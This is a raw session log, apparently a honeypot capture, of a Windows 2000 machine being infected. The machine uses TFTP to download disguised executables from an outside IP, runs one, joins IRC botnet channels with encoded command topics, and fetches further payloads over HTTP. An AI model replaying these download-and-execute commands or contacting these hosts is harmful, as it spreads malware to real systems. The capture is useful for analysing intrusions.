VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32>
VICTIM: tftp -i 122.106.28.155 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: Transfer successful: 64000 bytes in 22 seconds, 2909 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 122.106.28.155 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: Transfer successful: 64000 bytes in 22 seconds, 2909 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: C:\\WINNT\\system32>
VICTIM: USER zcponw zcponw zcponw :golyflpiofwndyem
VICTIM: NICK JzGcXsuj
ATTACKER: :hub.40684.com 001 JzGcXsuj :eduzz, JzGcXsuj!zcponw@192.168.1.69:hub.40684.com 005 JzGcXsuj MAP KNOCK SAFELIST HCN MAXCHANNELS=80 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:hub.40684.com 005 JzGcXsuj WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=eduzz CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:JzGcXsuj MODE JzGcXsuj :+iRp
VICTIM: MODE JzGcXsuj +xi
VICTIM: JOIN #las6 USERHOST JzGcXsuj
ATTACKER: :JzGcXsuj!zcponw@192.168.1.69 JOIN :#las6:hub.40684.com 332 JzGcXsuj #las6 :=mDWIocXFFHOeJkQb5QJl9J9RlrAsCXeYayH4Huco1mG9HQKwfcjfPIM8QyYzX6g0XzinKTwC95tpmzYcyde+U0Qfa/nt2xF4lufh0U8OvCMfkjkwmxtnE49:hub.40684.com 333 JzGcXsuj #las6 sosz 1192188657:hub.40684.com 353 JzGcXsuj @ #las6 :JzGcXsuj :hub.40684.com 366 JzGcXsuj #las6 :End of /NAMES list.:hub.40684.com 302 JzGcXsuj :JzGcXsuj=+zcponw@192.168.1.69
VICTIM: MODE #las6 +smntu
ATTACKER: :hub.40684.com 482 JzGcXsuj #las6 :You're not channel operator
VICTIM: JOIN #rs2 p\002\002JOIN #fox p\002\002
ATTACKER: :JzGcXsuj!zcponw@192.168.1.69 JOIN :#rs2:hub.40684.com 332 JzGcXsuj #rs2 :=JoeLUicp48L6NXkGKImNfcMvIctiOmN4iZagdN/DyG3b2ibm6nMcgYynJIypDId12i6x2l4RP3mJUvYDWwJAJxU9IUvpj7KCY2ShEqgMnbverSOE4vhmi084OXyvBDx7Qhd1EmrpJObJEeWRbkbPiRwY9ZEtPWVJ8xIuA+gNUjrCRWOm62tygoA2skM0xUz1GhSxyqtRPEp:hub.40684.com 333 JzGcXsuj #rs2 BLaCK^D3v|L 1201199609:hub.40684.com 353 JzGcXsuj @ #rs2 :JzGcXsuj :hub.40684.com 366 JzGcXsuj #rs2 :End of /NAMES list.:JzGcXsuj!zcponw@192.168.1.69 JOIN :#fox:hub.40684.com 332 JzGcXsuj #fox :=Vp/F02eT70aez5kG6AuTM8M/oUcmEveFXxNwGPlDfDINBfll5s6iRrbL43zxTJNy8oPkW5Ectn+Memd/g/XGFI0Dtu7tEzuN80E3RpaBwH/IiGTBI1irKZ6WD8NEwUxrjvxH+iPT9Ep:hub.40684.com 333 JzGcXsuj #fox always 1200174386:hub.40684.com 353 JzGcXsuj @ #fox :JzGcXsuj :hub.40684.com 366 JzGcXsuj #fox :End of /NAMES list.
VICTIM: MODE #rs2 +smntu
ATTACKER: :hub.40684.com 482 JzGcXsuj #rs2 :You're not channel operator
VICTIM: MODE #fox +smntu
VICTIM: GET /is.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /is2.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /x.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /is3.exe HTTP/1.0Host: nadsam0.info
ATTACKER: :hub.40684.com 482 JzGcXsuj #fox :You're not channel operator
ATTACKER: GET /sooo2.exe HTTP/1.0Host: 220.196.59.226